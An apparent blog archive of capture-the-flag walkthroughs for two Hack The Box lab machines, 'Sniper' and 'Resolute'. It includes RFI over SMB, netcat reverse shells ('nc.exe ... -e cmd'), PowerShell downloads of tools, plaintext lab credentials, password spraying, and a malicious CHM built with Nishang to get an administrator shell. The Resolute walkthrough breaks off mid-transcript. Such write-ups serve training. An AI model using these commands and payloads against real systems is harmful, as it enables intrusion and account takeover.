Month: January 2020
Protected: htb-osint-challenges
Protected: htb-challenge-emdee five
htb-sniper-nl
As always 1st a nmap scan
root@kali:~/htb/sniper# nmap -A 10.10.10.151 -oN fullscan Starting Nmap 7.80 ( https://nmap.org ) at 2020-01-27 05:00 EST Nmap scan report for sniper.htb (10.10.10.151) Host is up (0.091s latency). Not shown: 996 filtered ports PORT STATE SERVICE VERSION 80/tcp open http Microsoft IIS httpd 10.0 | http-methods: |_ Potentially risky methods: TRACE |_http-server-header: Microsoft-IIS/10.0 |_http-title: Sniper Co. 135/tcp open msrpc Microsoft Windows RPC 139/tcp open netbios-ssn Microsoft Windows netbios-ssn 445/tcp open microsoft-ds? Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port OS fingerprint not ideal because: Missing a closed TCP port so results incomplete No OS matches for host Network Distance: 2 hops Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows Host script results: |_clock-skew: 8h01m34s | smb2-security-mode: | 2.02: |_ Message signing enabled but not required | smb2-time: | date: 2020-01-27T18:02:27 |_ start_date: N/A TRACEROUTE (using port 445/tcp) HOP RTT ADDRESS 1 92.15 ms 10.10.14.1 2 94.52 ms sniper.htb (10.10.10.151) OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 65.82 seconds root@kali:~/htb/sniper#
I see that only a few ports are open, including SMB and a web server. After some analysis of the SMB server, I find nothing of immediate importance, so I keep browsing the web pages.At some point in the blog I see one that accepts a parameter, so I start playing with it. Because it can be vulnerable to injection, I start with local and external file injections. After some ups and downs I find that neither local nor external file recording works via HTTP, so I continue to look to see if anything else is possible. With this Burp research I find this link on RFI based on SMB.
GET /blog/?lang=\WINDOWS\system32\drivers\etc\hosts HTTP/1.1 Host: 10.10.10.151 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Connection: close Upgrade-Insecure-Requests: 1
So I reconfigure my SMB server to have a share called "sniper" and see if I can replicate what is in the examples. see also: https://www.puckiestyle.nl/create-a-public-samba-share/
on kali 1st run : systemctl start smbd
After some trial and error, I see my nickname popping up in the source code, indicating that the RFI over SMB has worked. So now it is time to get this webshell and call it through my SMB Server.
The db.php file contains a username and password, because they can be interesting. I note them for further use and decide it is time to try a decent shell.
powershell Invoke-Webrequest "http://10.10.10.78/nc.exe" -OutFile c:\puckiestyle\nc.exe
So first I use Powershell to transfer netcat. or even simpler with uploading wwwwolfshell
nc.exe 10.10.14.11 9001 -e cmd
Then i call nc.exe , and get a shell on sniper
root@kali:~/htb# rlwrap nc -nlvp 9001 listening on [any] 9001 ... connect to [10.10.14.11] from (UNKNOWN) [10.10.10.151] 49684 Microsoft Windows [Version 10.0.17763.678] (c) 2018 Microsoft Corporation. All rights reserved. C:\puckiestyle>whoami whoami nt authority\iusr C:\puckiestyle>
So I got the shell as iUSR There is only one other regular user in the box named Chris. Maybe the database password is the same as the user password, so I want to try using PowerShell to escalate my rights. After some searching on how to use the password with a PowerShell command, I came across a scriptand decided to adjust it to my needs.
root@kalivm:~/Sniper# cat getshell.ps1
$username = 'SNIPER\Chris'
$password = '36mEAhz/B8xQ~2VM'
$securePassword = ConvertTo-SecureString $password -AsPlainText -Force
$credential = New-Object System.Management.Automation.PSCredential -ArgumentList $username,$securePassword
New-PSSession -Credential $credential | Enter-PSSession
Again, I use PowerShell to transfer the file and then execute it.
powershell Invoke-WebRequest "http://10.10.14.11/getshell.ps1" -OutFile c:\puckiestyle\getshell.ps1
c:\puckiestyle>powershell
powershell
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.
PS C:\sedje> Invoke-WebRequest "http://10.10.12.78/getshell.ps1" -OutFile c:\sedje\getshell.ps1
Invoke-WebRequest "http://10.10.12.78/getshell.ps1" -OutFile c:\sedje\getshell.ps1
PS C:\sedje> ./getshell.ps1
./getshell.ps1
[localhost]: PS C:\Users\Chris\Documents> whoami
whoami
sniper\chris
[localhost]: PS C:\Users\Chris\Documents>dir c:\
dir c:\
[localhost]: PS C:\Users\Chris\Documents>
c:\>cmd /c icacls puckiestyle /c /t /grant everyone:F cmd /c icacls puckiestyle /c /t /grant everyone:F processed file: puckiestyle processed file: puckiestyle\getshell.ps1 processed file: puckiestyle\Microsoft processed file: puckiestyle\nc.exe processed file: puckiestyle\Microsoft\Windows processed file: puckiestyle\Microsoft\Windows\PowerShell processed file: puckiestyle\Microsoft\Windows\PowerShell\ModuleAnalysisCache Successfully processed 7 files; Failed processing 0 files c:\puckiestyle>powershell powershell Windows PowerShell Copyright (C) Microsoft Corporation. All rights reserved. PS C:\puckiestyle>
[localhost]: PS C:\Users\Chris\Documents> C:\puckiestyle\nc.exe 10.10.14.11 9002 -e powershell C:\puckiestyle\nc.exe 10.10.14.11 9002 -e powershell
root@kali:/opt/evil-winrm# rlwrap nc -nlvp 9002 listening on [any] 9002 ... connect to [10.10.14.11] from (UNKNOWN) [10.10.10.151] 49711 Windows PowerShell Copyright (C) Microsoft Corporation. All rights reserved. PS C:\Users\Chris\Documents> type ../Desktop/user.txt type ../Desktop/user.txt 21f4d0f29fc4dd867500c1ad716cf56e PS C:\Users\Chris\Documents>
Now I have a fully functional shell
it is also possible with WinRM
first upload and run plink.exe
C:\temp>.\plink.exe -R 5985:127.0.0.1:5985 10.10.14.8 ^J.\plink.exe -R 5985:127.0.0.1:5985 10.10.14.8 The server's host key is not cached in the registry. You have no guarantee that the server is the computer you think it is. The server's rsa2 key fingerprint is: ssh-rsa 2048 85:9c:65:7b:ec:db:65:ee:28:91:c7:2e:2f:e0:22:06 If you trust this host, enter "y" to add the key to PuTTY's cache and carry on connecting. If you want to carry on connecting just once, without adding the key to the cache, enter "n". If you do not trust this host, press Return to abandon the connection. Store key in cache? (y/n) y ^Jlogin as: puck ^Jpuck@10.10.14.8's password: secretpassword ^J Linux kali 4.19.0-kali1-amd64 #1 SMP Debian 4.19.13-1kali1 (2019-01-03) x86_64 The programs included with the Kali GNU/Linux system are free software; the exact distribution terms for each program are described in the individual files in /usr/share/doc/*/copyright. Kali GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent permitted by applicable law. Last login: Mon Jan 27 03:34:27 2020 from 10.10.10.151 Could not chdir to home directory /home/puck: No such file or directory $
and next
PrivEsc
I found this
PS C:\Users\Chris> dir Downloads
dir Downloads
Directory: C:\Users\Chris\Downloads
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 4/11/2019 8:36 AM 10462 instructions.chm
A complete HTML help file, so this can be interesting. with netcat I transported this file to my windows box, and this was the content
After more enumeration on disk i found
PS C:\DocsC:\Docs> type note.txt Hi Chris, Your php skillz suck. Contact yamitenshi so that he teaches you how to use it and after that fix the website as there are a lot of bugs on it. And I hope that you've prepared the documentation for our new app. Drop it here when you're done with it. Regards, Sniper CEO.
So apparently the file instructions.chm is what Chris should prepare for the CEO and then go to this folder., I 1st installed htmlexe.exe from https://www.microsoft.com/en-us/download/details.aspx?id=21138 and then used Nishang : https://raw.githubusercontent.com/samratashok/nishang/master/Client/Out-CHM.ps1
C:\temp\Powershell -Version 2 PS C:\temp> Import-Module .\Out-CHM.ps1 PS C:\temp> out-chm -Payload "c:\temp\nc 10.10.14.8 5353 -e cmd" -HHCPath "C:\Program Files (x86)\HTML Help Workshop" Microsoft HTML Help Compiler 4.74.8702 Compiling c:\temp\doc.chm Compile time: 0 minutes, 0 seconds 2 Topics 4 Local links 4 Internet links 0 Graphics Created c:\temp\doc.chm, 13,428 bytes Compression increased file by 271 bytes. PS C:\temp> copy .\doc.chm c:\python37\project.chm
root@kali:~/htb/sniper# python3 -m http.server 82 Serving HTTP on 0.0.0.0 port 82 (http://0.0.0.0:82/) ... 10.10.10.151 - - [27/Jan/2020 03:58:26] "GET /project.chm HTTP/1.1" 200 -
PS C:\Docs> Invoke-WebRequest "http://10.10.14.8:82/project.chm" -Outfile c:\Docs\project.chm
Invoke-WebRequest "http://10.10.14.8:82/project.chm" -Outfile c:\Docs\project.chm
From the Sniper host I do an Invoke WebRequest again to download the CHM file to the desired folder while a netcat listener waits for the shell to execute
root@kali:~/Sniper# nc -nlvp 9005
Listening on 0.0.0.0 9005
Connection received on 10.10.10.151 53736
Microsoft Windows [Version 10.0.17763.678]
(c) 2018 Microsoft Corporation. All rights reserved.
C:\Windows\system32>whoami
whoami
sniper\administrator
C:\Windows\system32>cd C:\Users\Administrator\Desktop
cd C:\Users\Administrator\Desktop
C:\Users\Administrator\Desktop>type root.txt
type root.txt
5624caf363e2750e994f6be0b7436c15
Author : Puckiestyle
htb-resolute-nl
Like all windows based machines, I added IP 10.10.10.169 to my etc / hosts as resolute.htb and ran a port scan with nmap
NMAP SCAN RESULTS
E:\PENTEST>nmap -T4 -A -v 10.10.10.169 Starting Nmap 7.70 ( https://nmap.org ) at 2020-07-10 09:15 W. Europe Summer Time NSE: Loaded 148 scripts for scanning. NSE: Script Pre-scanning. Initiating NSE at 09:15 Completed NSE at 09:15, 0.00s elapsed Initiating NSE at 09:15 Completed NSE at 09:15, 0.00s elapsed Initiating Ping Scan at 09:15 Scanning 10.10.10.169 [4 ports] Completed Ping Scan at 09:15, 2.59s elapsed (1 total hosts) Initiating Parallel DNS resolution of 1 host. at 09:16 Completed Parallel DNS resolution of 1 host. at 09:16, 0.00s elapsed Initiating SYN Stealth Scan at 09:16 Scanning 10.10.10.169 [1000 ports] Discovered open port 445/tcp on 10.10.10.169 Discovered open port 135/tcp on 10.10.10.169 Discovered open port 139/tcp on 10.10.10.169 Discovered open port 88/tcp on 10.10.10.169 Discovered open port 636/tcp on 10.10.10.169 Discovered open port 593/tcp on 10.10.10.169 Discovered open port 389/tcp on 10.10.10.169 Discovered open port 464/tcp on 10.10.10.169 Completed SYN Stealth Scan at 09:16, 1.31s elapsed (1000 total ports) Initiating Service scan at 09:16 Scanning 8 services on 10.10.10.169 Completed Service scan at 09:16, 17.39s elapsed (8 services on 1 host) Initiating OS detection (try #1) against 10.10.10.169 Retrying OS detection (try #2) against 10.10.10.169 Retrying OS detection (try #3) against 10.10.10.169 Retrying OS detection (try #4) against 10.10.10.169 Retrying OS detection (try #5) against 10.10.10.169 Initiating Traceroute at 09:16 Completed Traceroute at 09:16, 0.15s elapsed Initiating Parallel DNS resolution of 2 hosts. at 09:16 Completed Parallel DNS resolution of 2 hosts. at 09:16, 6.51s elapsed NSE: Script scanning 10.10.10.169. Initiating NSE at 09:16 Completed NSE at 09:17, 26.25s elapsed Initiating NSE at 09:17 Completed NSE at 09:17, 0.21s elapsed Nmap scan report for 10.10.10.169 Host is up (0.18s latency). Not shown: 992 closed ports PORT STATE SERVICE VERSION 88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2020-07-10 07:29:38Z) 135/tcp open msrpc Microsoft Windows RPC 139/tcp open netbios-ssn Microsoft Windows netbios-ssn 389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: megabank.local, Site: Default-First-Site-Name) 445/tcp open microsoft-ds Windows Server 2016 Standard 14393 microsoft-ds (workgroup: MEGABANK) 464/tcp open kpasswd5? 593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0 636/tcp open tcpwrapped No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ). TCP/IP fingerprint: OS:SCAN(V=7.70%E=4%D=7/10%OT=88%CT=1%CU=37112%PV=Y%DS=2%DC=T%G=Y%TM=5F0815F OS:B%P=i686-pc-windows-windows)SEQ(SP=100%GCD=1%ISR=102%TI=I%CI=I%II=I%SS=S OS:%TS=9)SEQ(SP=100%GCD=1%ISR=102%TI=RD%CI=RD%II=I%TS=A)OPS(O1=M54DNW8ST11% OS:O2=M54DNW8ST11%O3=M54DNW8NNT11%O4=M54DNW8ST11%O5=M54DNW8ST11%O6=M54DST11 OS:)WIN(W1=2000%W2=2000%W3=2000%W4=2000%W5=2000%W6=2000)ECN(R=Y%DF=Y%T=80%W OS:=2000%O=M54DNW8NNS%CC=Y%Q=)T1(R=Y%DF=Y%T=80%S=O%A=S+%F=AS%RD=0%Q=)T2(R=Y OS:%DF=Y%T=80%W=0%S=Z%A=S%F=AR%O=%RD=0%Q=)T3(R=Y%DF=Y%T=80%W=0%S=Z%A=O%F=AR OS:%O=%RD=0%Q=)T4(R=Y%DF=Y%T=80%W=0%S=A%A=O%F=R%O=%RD=0%Q=)T5(R=Y%DF=Y%T=80 OS:%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=80%W=0%S=A%A=O%F=R%O=%RD=0%Q OS:=)T7(R=Y%DF=Y%T=80%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%T=80%IPL=164 OS:%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=80%CD=Z) Network Distance: 2 hops TCP Sequence Prediction: Difficulty=256 (Good luck!) IP ID Sequence Generation: Incremental Service Info: Host: RESOLUTE; OS: Windows; CPE: cpe:/o:microsoft:windows Host script results: |_clock-skew: mean: 2h33m20s, deviation: 4h02m31s, median: 13m19s | smb-os-discovery: | OS: Windows Server 2016 Standard 14393 (Windows Server 2016 Standard 6.3) | Computer name: Resolute | NetBIOS computer name: RESOLUTE\x00 | Domain name: megabank.local | Forest name: megabank.local | FQDN: Resolute.megabank.local |_ System time: 2020-07-10T00:30:12-07:00 | smb-security-mode: | account_used: guest | authentication_level: user | challenge_response: supported |_ message_signing: required | smb2-security-mode: | 2.02: |_ Message signing enabled and required | smb2-time: | date: 2020-07-10 09:30:10 |_ start_date: 2020-07-10 09:29:14 TRACEROUTE (using port 1720/tcp) HOP RTT ADDRESS 1 85.00 ms 10.10.14.1 2 144.00 ms 10.10.10.169 NSE: Script Post-scanning. Initiating NSE at 09:17 Completed NSE at 09:17, 0.00s elapsed Initiating NSE at 09:17 Completed NSE at 09:17, 0.00s elapsed Read data files from: C:\Program Files (x86)\Nmap OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 82.49 seconds Raw packets sent: 1108 (52.474KB) | Rcvd: 1122 (48.618KB) E:\PENTEST>
Next i used enum4linux
kali@kali:~/htb/resolute$ enum4linux 10.10.10.169 Starting enum4linux v0.8.9 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Fri Jul 10 03:23:18 2020 ========================== | Target Information | ========================== Target ........... 10.10.10.169 RID Range ........ 500-550,1000-1050 Username ......... '' Password ......... '' Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none ==================================================== | Enumerating Workgroup/Domain on 10.10.10.169 | ==================================================== [E] Can't find workgroup/domain ============================================ | Nbtstat Information for 10.10.10.169 | ============================================ Looking up status of 10.10.10.169 No reply from 10.10.10.169 ===================================== | Session Check on 10.10.10.169 | ===================================== [+] Server 10.10.10.169 allows sessions using username '', password '' Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 451. [+] Got domain/workgroup name: =========================================== | Getting domain SID for 10.10.10.169 | =========================================== Domain Name: MEGABANK Domain Sid: S-1-5-21-1392959593-3013219662-3596683436 [+] Host is part of a domain (not a workgroup) ====================================== | OS information on 10.10.10.169 | ====================================== Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 458. [+] Got OS info for 10.10.10.169 from smbclient: [+] Got OS info for 10.10.10.169 from srvinfo: Unable to initialize messaging context Could not initialise srvsvc. Error was NT_STATUS_ACCESS_DENIED ============================= | Users on 10.10.10.169 | ============================= Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 866. index: 0x10b0 RID: 0x19ca acb: 0x00000010 Account: abigail Name: (null) Desc: (null) index: 0xfbc RID: 0x1f4 acb: 0x00000210 Account: Administrator Name: (null) Desc: Built-in account for administering the computer/domain index: 0x10b4 RID: 0x19ce acb: 0x00000010 Account: angela Name: (null) Desc: (null) index: 0x10bc RID: 0x19d6 acb: 0x00000010 Account: annette Name: (null) Desc: (null) index: 0x10bd RID: 0x19d7 acb: 0x00000010 Account: annika Name: (null) Desc: (null) index: 0x10b9 RID: 0x19d3 acb: 0x00000010 Account: claire Name: (null) Desc: (null) index: 0x10bf RID: 0x19d9 acb: 0x00000010 Account: claude Name: (null) Desc: (null) index: 0xfbe RID: 0x1f7 acb: 0x00000215 Account: DefaultAccount Name: (null) Desc: A user account managed by the system. index: 0x10b5 RID: 0x19cf acb: 0x00000010 Account: felicia Name: (null) Desc: (null) index: 0x10b3 RID: 0x19cd acb: 0x00000010 Account: fred Name: (null) Desc: (null) index: 0xfbd RID: 0x1f5 acb: 0x00000215 Account: Guest Name: (null) Desc: Built-in account for guest access to the computer/domain index: 0x10b6 RID: 0x19d0 acb: 0x00000010 Account: gustavo Name: (null) Desc: (null) index: 0xff4 RID: 0x1f6 acb: 0x00000011 Account: krbtgt Name: (null) Desc: Key Distribution Center Service Account index: 0x10b1 RID: 0x19cb acb: 0x00000010 Account: marcus Name: (null) Desc: (null) index: 0x10a9 RID: 0x457 acb: 0x00000210 Account: marko Name: Marko Novak Desc: Account created. Password set to Welcome123! index: 0x10c0 RID: 0x2775 acb: 0x00000010 Account: melanie Name: (null) Desc: (null) index: 0x10c3 RID: 0x2778 acb: 0x00000010 Account: naoki Name: (null) Desc: (null) index: 0x10ba RID: 0x19d4 acb: 0x00000010 Account: paulo Name: (null) Desc: (null) index: 0x10be RID: 0x19d8 acb: 0x00000010 Account: per Name: (null) Desc: (null) index: 0x10a3 RID: 0x451 acb: 0x00000210 Account: ryan Name: Ryan Bertrand Desc: (null) index: 0x10b2 RID: 0x19cc acb: 0x00000010 Account: sally Name: (null) Desc: (null) index: 0x10c2 RID: 0x2777 acb: 0x00000010 Account: simon Name: (null) Desc: (null) index: 0x10bb RID: 0x19d5 acb: 0x00000010 Account: steve Name: (null) Desc: (null) index: 0x10b8 RID: 0x19d2 acb: 0x00000010 Account: stevie Name: (null) Desc: (null) index: 0x10af RID: 0x19c9 acb: 0x00000010 Account: sunita Name: (null) Desc: (null) index: 0x10b7 RID: 0x19d1 acb: 0x00000010 Account: ulf Name: (null) Desc: (null) index: 0x10c1 RID: 0x2776 acb: 0x00000010 Account: zach Name: (null) Desc: (null) Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 881. user:[Administrator] rid:[0x1f4] user:[Guest] rid:[0x1f5] user:[krbtgt] rid:[0x1f6] user:[DefaultAccount] rid:[0x1f7] user:[ryan] rid:[0x451] user:[marko] rid:[0x457] user:[sunita] rid:[0x19c9] user:[abigail] rid:[0x19ca] user:[marcus] rid:[0x19cb] user:[sally] rid:[0x19cc] user:[fred] rid:[0x19cd] user:[angela] rid:[0x19ce] user:[felicia] rid:[0x19cf] user:[gustavo] rid:[0x19d0] user:[ulf] rid:[0x19d1] user:[stevie] rid:[0x19d2] user:[claire] rid:[0x19d3] user:[paulo] rid:[0x19d4] user:[steve] rid:[0x19d5] user:[annette] rid:[0x19d6] user:[annika] rid:[0x19d7] user:[per] rid:[0x19d8] user:[claude] rid:[0x19d9] user:[melanie] rid:[0x2775] user:[zach] rid:[0x2776] user:[simon] rid:[0x2777] user:[naoki] rid:[0x2778] ========================================= | Share Enumeration on 10.10.10.169 | ========================================= Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 640. directory_create_or_exist: mkdir failed on directory /run/samba/msg.lock: Permission denied Unable to initialize messaging context Sharename Type Comment --------- ---- ------- SMB1 disabled -- no workgroup available [+] Attempting to map shares on 10.10.10.169 ==================================================== | Password Policy Information for 10.10.10.169 | ==================================================== [+] Attaching to 10.10.10.169 using a NULL share [+] Trying protocol 139/SMB... [!] Protocol failed: Cannot request session (Called Name:10.10.10.169) [+] Trying protocol 445/SMB... [+] Found domain(s): [+] MEGABANK [+] Builtin [+] Password Info for Domain: MEGABANK [+] Minimum password length: 7 [+] Password history length: 24 [+] Maximum password age: Not Set [+] Password Complexity Flags: 000000 [+] Domain Refuse Password Change: 0 [+] Domain Password Store Cleartext: 0 [+] Domain Password Lockout Admins: 0 [+] Domain Password No Clear Change: 0 [+] Domain Password No Anon Change: 0 [+] Domain Password Complex: 0 [+] Minimum password age: 1 day 4 minutes [+] Reset Account Lockout Counter: 30 minutes [+] Locked Account Duration: 30 minutes [+] Account Lockout Threshold: None [+] Forced Log off Time: Not Set Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 501. [+] Retieved partial password policy with rpcclient: Password Complexity: Disabled Minimum Password Length: 7 ============================== | Groups on 10.10.10.169 | ============================== Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 542. [+] Getting builtin groups: group:[Account Operators] rid:[0x224] group:[Pre-Windows 2000 Compatible Access] rid:[0x22a] group:[Incoming Forest Trust Builders] rid:[0x22d] group:[Windows Authorization Access Group] rid:[0x230] group:[Terminal Server License Servers] rid:[0x231] group:[Administrators] rid:[0x220] group:[Users] rid:[0x221] group:[Guests] rid:[0x222] group:[Print Operators] rid:[0x226] group:[Backup Operators] rid:[0x227] group:[Replicator] rid:[0x228] group:[Remote Desktop Users] rid:[0x22b] group:[Network Configuration Operators] rid:[0x22c] group:[Performance Monitor Users] rid:[0x22e] group:[Performance Log Users] rid:[0x22f] group:[Distributed COM Users] rid:[0x232] group:[IIS_IUSRS] rid:[0x238] group:[Cryptographic Operators] rid:[0x239] group:[Event Log Readers] rid:[0x23d] group:[Certificate Service DCOM Access] rid:[0x23e] group:[RDS Remote Access Servers] rid:[0x23f] group:[RDS Endpoint Servers] rid:[0x240] group:[RDS Management Servers] rid:[0x241] group:[Hyper-V Administrators] rid:[0x242] group:[Access Control Assistance Operators] rid:[0x243] group:[Remote Management Users] rid:[0x244] group:[System Managed Accounts Group] rid:[0x245] group:[Storage Replica Administrators] rid:[0x246] group:[Server Operators] rid:[0x225] [+] Getting builtin group memberships: Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 574. [+] Getting local groups: group:[Cert Publishers] rid:[0x205] group:[RAS and IAS Servers] rid:[0x229] group:[Allowed RODC Password Replication Group] rid:[0x23b] group:[Denied RODC Password Replication Group] rid:[0x23c] group:[DnsAdmins] rid:[0x44d] [+] Getting local group memberships: Group 'Denied RODC Password Replication Group' (RID: 572) has member: Couldn't lookup SIDs Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 593. [+] Getting domain groups: group:[Enterprise Read-only Domain Controllers] rid:[0x1f2] group:[Domain Admins] rid:[0x200] group:[Domain Users] rid:[0x201] group:[Domain Guests] rid:[0x202] group:[Domain Computers] rid:[0x203] group:[Domain Controllers] rid:[0x204] group:[Schema Admins] rid:[0x206] group:[Enterprise Admins] rid:[0x207] group:[Group Policy Creator Owners] rid:[0x208] group:[Read-only Domain Controllers] rid:[0x209] group:[Cloneable Domain Controllers] rid:[0x20a] group:[Protected Users] rid:[0x20d] group:[Key Admins] rid:[0x20e] group:[Enterprise Key Admins] rid:[0x20f] group:[DnsUpdateProxy] rid:[0x44e] group:[Contractors] rid:[0x44f] [+] Getting domain group memberships: Group 'Contractors' (RID: 1103) has member: MEGABANK\ryan Group 'Domain Users' (RID: 513) has member: MEGABANK\Administrator Group 'Domain Users' (RID: 513) has member: MEGABANK\DefaultAccount Group 'Domain Users' (RID: 513) has member: MEGABANK\krbtgt Group 'Domain Users' (RID: 513) has member: MEGABANK\ryan Group 'Domain Users' (RID: 513) has member: MEGABANK\marko Group 'Domain Users' (RID: 513) has member: MEGABANK\sunita Group 'Domain Users' (RID: 513) has member: MEGABANK\abigail Group 'Domain Users' (RID: 513) has member: MEGABANK\marcus Group 'Domain Users' (RID: 513) has member: MEGABANK\sally Group 'Domain Users' (RID: 513) has member: MEGABANK\fred Group 'Domain Users' (RID: 513) has member: MEGABANK\angela Group 'Domain Users' (RID: 513) has member: MEGABANK\felicia Group 'Domain Users' (RID: 513) has member: MEGABANK\gustavo Group 'Domain Users' (RID: 513) has member: MEGABANK\ulf Group 'Domain Users' (RID: 513) has member: MEGABANK\stevie Group 'Domain Users' (RID: 513) has member: MEGABANK\claire Group 'Domain Users' (RID: 513) has member: MEGABANK\paulo Group 'Domain Users' (RID: 513) has member: MEGABANK\steve Group 'Domain Users' (RID: 513) has member: MEGABANK\annette Group 'Domain Users' (RID: 513) has member: MEGABANK\annika Group 'Domain Users' (RID: 513) has member: MEGABANK\per Group 'Domain Users' (RID: 513) has member: MEGABANK\claude Group 'Domain Users' (RID: 513) has member: MEGABANK\melanie Group 'Domain Users' (RID: 513) has member: MEGABANK\zach Group 'Domain Users' (RID: 513) has member: MEGABANK\simon Group 'Domain Users' (RID: 513) has member: MEGABANK\naoki Group 'Domain Computers' (RID: 515) has member: MEGABANK\MS02$ Group 'Enterprise Admins' (RID: 519) has member: MEGABANK\Administrator Group 'Domain Admins' (RID: 512) has member: MEGABANK\Administrator Group 'Group Policy Creator Owners' (RID: 520) has member: MEGABANK\Administrator Group 'Schema Admins' (RID: 518) has member: MEGABANK\Administrator Group 'Domain Controllers' (RID: 516) has member: MEGABANK\RESOLUTE$ ======================================================================= | Users on 10.10.10.169 via RID cycling (RIDS: 500-550,1000-1050) | ======================================================================= [E] Couldn't get SID: NT_STATUS_ACCESS_DENIED. RID cycling not possible. ============================================= | Getting printer info for 10.10.10.169 | ============================================= Unable to initialize messaging context Could not initialise spoolss. Error was NT_STATUS_ACCESS_DENIED enum4linux complete on Fri Jul 10 03:25:47 2020 kali@kali:~/htb$
I have the list of users and their roles and a clear text password of a user.
GETTING USER
Let us exploit SAMBA Service using RPCClient tool. Before that, let us gather some more information about the user Marko who’s password we have in clear text format in the Enum4Linux scan.
kali@kali:~/htb/resolute$ rpcclient -U "" -N 10.10.10.169 Unable to initialize messaging context rpcclient $> queryuser marko User Name : marko Full Name : Marko Novak Home Drive : Dir Drive : Profile Path: Logon Script: Description : Account created. Password set to Welcome123! Workstations: Comment : Remote Dial : Logon Time : Wed, 31 Dec 1969 19:00:00 EST Logoff Time : Wed, 31 Dec 1969 19:00:00 EST Kickoff Time : Wed, 13 Sep 30828 22:48:05 EDT Password last set Time : Fri, 27 Sep 2019 09:17:15 EDT Password can change Time : Sat, 28 Sep 2019 09:17:15 EDT Password must change Time: Wed, 13 Sep 30828 22:48:05 EDT unknown_2[0..31]... user_rid : 0x457 group_rid: 0x201 acb_info : 0x00000210 fields_present: 0x00ffffff logon_divs: 168 bad_password_count: 0x00000000 logon_count: 0x00000000 padding1[0..7]... logon_hrs[0..21]... rpcclient $>
I tried to run EvilWinRM with the user Marko’s credentials, but it didn’t work. So, I guessed that Marko doesn’t have access to the system or his account is locked out. I decided to use the same password for the rest of the users, the password Welcome123! worked for Melanie.
kali@kali:/opt/evil-winrm$ ruby evil-winrm.rb -i 10.10.10.169 -u melanie -p Welcome123! Evil-WinRM shell v2.3 Info: Establishing connection to remote endpoint *Evil-WinRM* PS C:\Users\melanie\Documents> cd .. *Evil-WinRM* PS C:\Users\melanie> cd Desktop *Evil-WinRM* PS C:\Users\melanie\Desktop> dir Directory: C:\Users\melanie\Desktop Mode LastWriteTime Length Name ---- ------------- ------ ---- -ar--- 12/3/2019 7:33 AM 32 user.txt *Evil-WinRM* PS C:\Users\melanie\Desktop> type user.txt 0c3[redacted]540 *Evil-WinRM* PS C:\Users\melanie\Desktop>
view for the hidden directories.
*Evil-WinRM* PS C:\> dir -force
I noticed the directory “PSTranscripts” and went on finding what is inside. The directory has a folder “20191203” inside, and there is a text file called “PowerShell_transcript.RESOLUTE.OJuoBGhU.20191203063201.txt”. The text file is a PowerShell transcript. I used Type to read the text file, here is the full transcript.
*Evil-WinRM* PS C:\PSTranscripts\20191203> type PowerShell_transcript.RESOLUTE.OJuoBGhU.20191203063201.txt ********************** Windows PowerShell transcript start Start time: 20191203063201 Username: MEGABANK\ryan RunAs User: MEGABANK\ryan Machine: RESOLUTE (Microsoft Windows NT 10.0.14393.0) Host Application: C:\Windows\system32\wsmprovhost.exe -Embedding Process ID: 2800 PSVersion: 5.1.14393.2273 PSEdition: Desktop PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.14393.2273 BuildVersion: 10.0.14393.2273 CLRVersion: 4.0.30319.42000 WSManStackVersion: 3.0 PSRemotingProtocolVersion: 2.3 SerializationVersion: 1.1.0.1 ********************** Command start time: 20191203063455 ********************** PS>TerminatingError(): "System error." >> CommandInvocation(Invoke-Expression): "Invoke-Expression" >> ParameterBinding(Invoke-Expression): name="Command"; value="-join($id,'PS ',$(whoami),'@',$env:computername,' ',$((gi $pwd).Name),'> ') if (!$?) { if($LASTEXITCODE) { exit $LASTEXITCODE } else { exit 1 } }" >> CommandInvocation(Out-String): "Out-String" >> ParameterBinding(Out-String): name="Stream"; value="True" ********************** Command start time: 20191203063455 ********************** PS>ParameterBinding(Out-String): name="InputObject"; value="PS megabank\ryan@RESOLUTE Documents> " PS megabank\ryan@RESOLUTE Documents> ********************** Command start time: 20191203063515 ********************** PS>CommandInvocation(Invoke-Expression): "Invoke-Expression" >> ParameterBinding(Invoke-Expression): name="Command"; value="cmd /c net use X: \\fs01\backups ryan Serv3r4Admin4cc123! if (!$?) { if($LASTEXITCODE) { exit $LASTEXITCODE } else { exit 1 } }" >> CommandInvocation(Out-String): "Out-String" >> ParameterBinding(Out-String): name="Stream"; value="True" ********************** Windows PowerShell transcript start Start time: 20191203063515 Username: MEGABANK\ryan RunAs User: MEGABANK\ryan Machine: RESOLUTE (Microsoft Windows NT 10.0.14393.0) Host Application: C:\Windows\system32\wsmprovhost.exe -Embedding 